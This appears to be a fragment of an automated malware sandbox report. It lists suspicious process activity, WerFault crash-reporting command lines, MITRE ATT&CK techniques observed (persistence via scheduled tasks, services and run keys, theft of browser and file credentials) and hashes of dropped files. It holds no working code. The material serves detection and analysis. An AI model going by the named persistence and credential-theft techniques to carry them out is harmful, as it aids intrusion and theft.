- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 996 -ip 9961⤵PID:464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3300 -ip 33001⤵PID:5140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5264 -ip 52641⤵PID:5524
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
761KB
MD5c6040234ee8eaedbe618632818c3b1b3
SHA168115f8c3394c782aa6ba663ac78695d2b80bf75
SHA256bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
SHA512a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
-
Filesize
248B
MD5b7237d815cc9c52533f58868e8e7f737
SHA1bb856fdea985b1a6eeef9fb9caf216d4f3ec07ae
SHA256fc9da827f3821367129daeb40d54f4287895fb91ac17e78a700bf814b082a968
SHA5120026f6519add75b3d4275a73f57ff55706a2ccbd28cb929ea54e6b8848b5f884c144aee98807e7b659bf80d76f30a650e9f57212e65277f243976e76bd586392
-
Filesize
248B
MD5fa254d780d25723444d7ff2276a8bbd6
SHA1422ecc53498bcce31df7ffc327bebea4518c5a34
SHA256ab386c116176dc615585347c041ec70e035cd010156c2c660f122d55e46ab9ce
SHA5121da8f4e2dbf18572c44bcb358cf61747c3f611899ceded761f532ec22081598873308f99e432cc0e4a18b98e5400124a00179b2ef042f4fac64567ab46690b12
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
217KB
MD5d15d21a47114e13d0ecd695f9cc7752b
SHA1dad45a62de5ac90c668d47ecc9b3d633e8db123d
SHA25661da3f2353e4f178df52f82fce50bc9a42ffc3b874d5983c84f60987162b8ac3
SHA5128307990631af0c14558c806172c79e1b0108ab99c65fc8f990d111a17b56f289855bd50ac54d0486650727e6b289b7561c7a8f612b75c359774e30d9c8dc59b3
-
Filesize
18KB
MD5fdd1342991bafae41ec738c49558d450
SHA11a53e9e5c8082717fa827196d6695dac46f4a112
SHA25628e0cb950acc19ea4ca30caa20aae0340f8b517f80856b16cbf6e3065dd42f01
SHA5120e87ca41388bf5556e413fba61b3a3b5f393088c19294d3db8f402549f0982e3186b08f3ea3aeaf0ea1b036b23cff22e346b5c36ca4101f06dafc0f7e5b7ef3d
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
8KB
MD569994ff2f00eeca9335ccd502198e05b
SHA1b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA2562e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
Filesize
22KB
MD5b2b951b1f31b3d72ffcee1d7db16a220
SHA15d893de0c59dfe6a3b6961902468a71a9ee30548
SHA25687423d4a32046e64360a0665041512c155b39ac8f699a2bed28c0d921b80e6f9
SHA512f78a78cc3c691652b03106c8a342be94cc10f0e37ba25fa328de5a1a1ded4c66887f90de4562238dd97ce220a3e469ab12ab53b9ae2f98138ab7fc1d2806a46c
-
Filesize
152B
MD5fd5be6bf7edefd41f74c88b7a95a7445
SHA1850295b9ea891048550b96ee0a44d5eb7408e57f
SHA256a44b46ccef464378680ea8f9492ca90333540517d195ffdc5f8b7e1f23ac2224
SHA512fa9312025b46683f73ad88cf30de954bdf9931857f85f0830be1481bf890a2e8e0f9fa36de23e40b818036e9bcde30ae9cd66bc3907432965c8f72ddd210313f
-
Filesize
3.7MB
MD56967a105bf22f11871cf14fb2fda7bf1
SHA19be5af0232c8219b9ba0df4cb2b924b07e467ac2
SHA256d06a144d1382d9fb1596b5a7a94d43377249bc95faee1d7b23dce3d6ac98dd3d
SHA512df232d8915746eac5383a179fbcf322d697eacca9104da95962826a85416555c708575ffb84a769d8699c03597309a84269f310f3d555525a39f86967f85dcc5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
234KB
MD5f6cd645f9c34789c5e8371e8b518871c
SHA16eac61bd26cb167b5987d94b369a9034e3979464
SHA2561a03d1b4b859424531b81e5c6e0278bad00f1995767d45055727d68de7cf3a3a
SHA512335931727d7e1c2d2ece2e8a505feb9ef17413ea82af883ab80028a83007ffc55823888db842938a9ea5b340b0779c79b608d0c8afbb7c82056fe5f3d75e3131
-
Filesize
3.5MB
MD56626a89aa5cc47a20e9de81360327a3e
SHA1c50e1f4cd7dc8cc23a3b73e0fb49464bbb6f2511
SHA256f9c6e2f4c1be741b973d13b711fe68c71a2245c9908d0345724805f5eff1e2e7
SHA512c3f2d9b5e7ddc03e8d1318f3a0faecf9e60938650203acf17032c3685ddb084e5d209e1f89d09886cc72eff9103ab907949df409a28504817453c85f9d28d170
-
Filesize
3.1MB
MD521ce4cd2ce246c86222b57b93cdc92bd
SHA19dc24ad846b2d9db64e5bbea1977e23bb185d224
SHA256273c917fc8fddcb94de25686720df1ea12f948dfbebffa56314b6565123ae678
SHA512ff43fe890e30d6766f51922cfd1e9c36d312fd305620954fae8c61829f58d7361ae442bf9145339904eb6a88c2629c1e83f5b8a1d78ab0d13554cf6053d194f6
-
Filesize
45KB
MD59dcd35fe3cafec7a25aa3cdd08ded1f4
SHA113f199bfd3f8b2925536144a1b42424675d7c8e4
SHA256ce4f85d935fe68a1c92469367b945f26c40c71feb656ef844c30a5483dc5c0be
SHA5129a4293b2f2d0f1b86f116c5560a238ea5910454d5235aedb60695254d7cc2c3b1cd9dd1b890b9f94249ee0ca25a9fb457a66ca52398907a6d5775b0d2e2b70d3
-
Filesize
526KB
MD53947cf0ed023919bd463207a59aab84c
SHA15ccbf9b782441a5e610888bad4219b22988b2173
SHA2563b4341374f5db8e0892cfb0e4991a003c1aee88dccfe68bd8b987552b8d594eb
SHA512ef7598b40c6c3e205a9f1645b101619d09ecbb76df9918199ac52a480627b11a7d793e25da793d867f727032f4573fb187cdfa8db128c3b15f5e14c49426d5f7
-
Filesize
35KB
MD5c95261eab6c76d4e65624919ccb13cd7
SHA19daad5cc07c35f96061ffec077454c99508f2532
SHA2566a8a6457a46f87a5d42d578b4807bee42305920cbf1bfb0402d8f3ae0c91ae30
SHA51292acd72ccee4ed8d7f66abb2e1b0520f76310d13634578aa46ce28229316ecbd6603bc6b9febe0fa91852c589f043fc3870229a921ac27020feb79f6b0dc4417
-
Filesize
12KB
MD55d8ca7142f17073e44a042e5988fce1a
SHA1d2a700dfbf8d15c535d7198c4285e48419ab91d1
SHA256ccbca6daf4e4d71d6d05c7563cbf37de2415b0beccac2405a2bba35fef9d2ae1
SHA512b2814b60f3e4f87daa7669ab13ed1e108ab1c49a5abb57180aa1952f0f15409a22bdab366eba4783897c8ea3eb46a287b063d88d85225f046212756a912342a5
-
Filesize
73KB
MD59d347d5ac998a89f78ba00e74b951f55
SHA173df3d5c8388a4d6693cbb24f719dba8833c9157
SHA2562ea5686422bd8fb6eda542e9a96588f9deb1c97c45f3cb7d3b21ac4da540b57c
SHA5123db7421aa98e8e108bf982048dda7e0f09428c6498cf5f9f56ef499fb2fafc5deabde8ecb99e1fdd570d54ae9c0533b7502de5848c9e772708cf75509d0c9d9e
-
Filesize
3.1MB
MD5ff8c68c60f122eb7f8473106d4bcf26c
SHA10efa03e7412e7e15868c93604372d2b2e6b80662
SHA2565ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642
SHA512ab92ef844a015c3fcbfba313872b922bff54184b25623ed34f4829bd66a95af081cdeefd35425a4d3b9d9085ccf8c25045cf6093d74a5c8c35012c1b7546688e
-
Filesize
12KB
MD58e3dd64a48207e0bed01c927f1335516
SHA1c6b7dd487b8f8f0d9c6548da7c2ff6492727f192
SHA25657015f166979bb55f694bf27e612d96c6cd630337ca692eab4392f30a4b3ee2a
SHA512d44625fe9390e045197331a4ba2b1dcd8e52d95615368cb9ef382ae1911393059cde274887f999dab2799a449b4dcdf481e106a664230d5e2bdbaef37f1e1fb8
-
Filesize
107KB
MD5036ba72c9c4cf36bda1dc440d537af3c
SHA13c10ef9932ffc206a586fe5768879bf078e9ebeb
SHA256bb41ae95f911a55ab1101ca7854918ec0f23548376d4846a2176b9c289102114
SHA512c7e8c37787b759bca7fb6d02692c0263d6c60f606ee52e890f3c177dabd00ac6305cd43056164f6e16fbc18046a8c4226172f295ebc85e310ea7e52878d5137d
-
Filesize
72KB
MD50076324b407d0783137badc7600327a1
SHA129e6cb1f18a43b8e293539d50272898a8befa341
SHA25655c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583
SHA51296b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4
-
Filesize
481KB
MD57163fe5f3a7bcfdeec9a07137838012a
SHA13bd90557615ef95e4244bdbaa8e0e7fd949cdd3a
SHA2565433726d3912a95552d16b72366eae777f5f34587e1bdaa0c518c5fcbc3d8506
SHA512ea6d91205ed0d53868f44077e1d6db3bf8d6e3607378be22e643df3777120aa36d53e39748e4220dbf1d3355a0b791b9a3e5ddc080018d169c81d7ce0afb6478
-
Filesize
28KB
MD52d3c280f66396febc80ee3024da80f8e
SHA170bda33b1a7521800a2c620cda4cf4b27487fa28
SHA256a7e4b2fd9cdb85f383f78ffe973776d40262d53727d0c58ea92c200ec1a7bd6d
SHA51226b38d618238336e36fd79f1e63b7c59490ca3e5616306da3ae3e0907415a1746aac638930e01f93529b16f3fe7968d48f5557d6bf32385f82a7bf1f944cf4ad
-
Filesize
507KB
MD54e7b96fe3160ff171e8e334c66c3205c
SHA1ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f
SHA256e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c
SHA5122e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48
-
Filesize
481KB
MD550dd6e5820551b0f7dd7f8b627595213
SHA105d3291e0ae3774b52c2b0cd3e402c71c635d003
SHA256be92e9c26ecf8e58ed7bac040283aa784cd89bcabb66d583c7a8a916a12dccb5
SHA512a40bfa8ac20af5e959bb804c9de22453a20c818a3e05fff8345510fe8e97eebb941b53500aa0189b248b492e06155e9bc82950ce74db168656bc6924babe58a6
-
Filesize
5.2MB
MD56f163d9cd94d4a58ad722301cf9847d0
SHA1ffcf6d1a5956dfb60a0fd7267039e30fbe2fd981
SHA256827642649f28e190ac328f026c6c1a332d45b2be4af76bd8f6c8e85838c90b11
SHA5125503fefd77a87f8030dbd468168abeb3b778857bd770720942f3f1b41cf498f79a3f9138bb1cb7b24b52f55d67724de31aeb42225ee21c8712719323d45e7d67
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
219B
MD50cf2c99e9a444efa6dd9f8f75afc6624
SHA1ee9003775e9b504702ac790af287e0bdf96fd1f5
SHA256074368a75d12d548885d34cfec6186f77fa8454db45f3a3ddc2f4f2801b42364
SHA512f7ba3b2dcae790f255a4cb17687a376dbf148582c3ed709659083f3dedec94ce9655d5b32c2120dd4dadbb313126ecdaf0741ee774d86fed84ee514d4e32a17d
-
Filesize
224B
MD5fc4adaf7fba29a42e4ff41cdb942022b
SHA1aca43b194a89f60961e0a77375cf159f15a5a377
SHA256a36650a768b4501ea45ff7c864907aec54f5183d684f96b8f183a775ec6d77cd
SHA512e176dc35490eff85d2fbd889093ab839f863d61454dc1f8839417841459f2cd78ec2e48cae72c9d76bffee3b379140a03f356944e4870958449635e4291211a2
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62